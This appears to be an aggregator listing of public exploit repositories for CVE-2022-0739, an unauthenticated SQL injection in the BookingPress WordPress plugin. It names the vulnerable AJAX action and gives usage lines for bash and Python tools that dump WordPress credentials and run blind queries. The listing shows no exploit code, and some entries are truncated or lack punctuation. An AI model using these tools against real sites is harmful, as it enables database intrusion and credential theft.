CVE-2022-0739

CVE-2022-0739 BookingPress[WordPress Plugin] SQLInjection BookingPress before 1011

Proof-of-Concept exploit (SQLI BookingPress before 1.0.11)

CVE-2022-0739 Proof-of-Concept exploit (SQLI BookingPress before 1011) DISCLAIMER Usage of this program without prior mutual consent can be considered as an illegal activity It is the final user's responsibility to obey all applicable local, state and federal laws Developers assume no liability and are not responsible for any misuse or damage caused by this program

Bash exploit for CVE-2022-0739 Unauthenticated SQL Injection for BookingPress < 1011 Usage: /exploitsh [options] Options: -u, --url VALUE Set the URL (ex: examplecom) (required) -e, --event-dir VALUE Set the event directory (ex: events) -h, --help Display this help message

Simple bash script to automate the exploit of cve 2022 0739

CVE-2022-0739 Proof-of-Concept exploit (SQLI BookingPress before 1011) #Usage Supply the URL to where the Booking Press plugin is in use on the application bash exploitsh '' eg (Hashes are redacted in this demo) ┌──(user@user)-[~/] └─$ bash sqli_exploitsh 'localhost/calendar/' ____ __ _ ____

CVE-2022-0739 Wordpress BookingPress SQLi

CVE-2022-0739 CVE-2022-0739 Wordpress BookingPress Plugin < 1011 Unauthenticated SQL Injection Getting Started Executing program With python3 python3 sqlipy -u 'wordpresssite' -p 'wpnonce_value' Help For help menu: python3 sqlipy -h Disclaimer All the code pr

BookingPress < 1.0.11 - Unauthenticated SQL Injection

CVE-2022-0739 BookingPress &lt; 1011 - Unauthenticated SQL Injection The plugin fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection CVE-2022-0739 pluginstracwordpres

Exploit for WP BookingPress (< 1.0.11) based on destr4ct POC.

CVE-2022-0739 My take on CVE-2022-0739 BookingPress exploit, based on destr4ct's POC - just prettier Example Example usage against HackTheBox's MetaTwo machine, which hosts a WordPress with a vulnerable bookingpress plugin (version 1010) python booking-sqlinjectorpy -u metapresshtb -nu metapresshtb/events/ -a -o db_dump

🐍 Python Exploit for CVE-2022-0739

CVE-2022-0739 Python PoC Exploit for CVE-2022-0739 Features Database Metadata Lookup Wordpress User Credential Dump Arbitrary Blind Query Injection 💉 Usage usage: cve-2022-0739 [-h] -u URL [-e EXEC] options: -h, --help show this help message and exit -u URL, --url URL URL of the page containing the BookingPress Widget -e EXEC, --exec EXEC Optional qu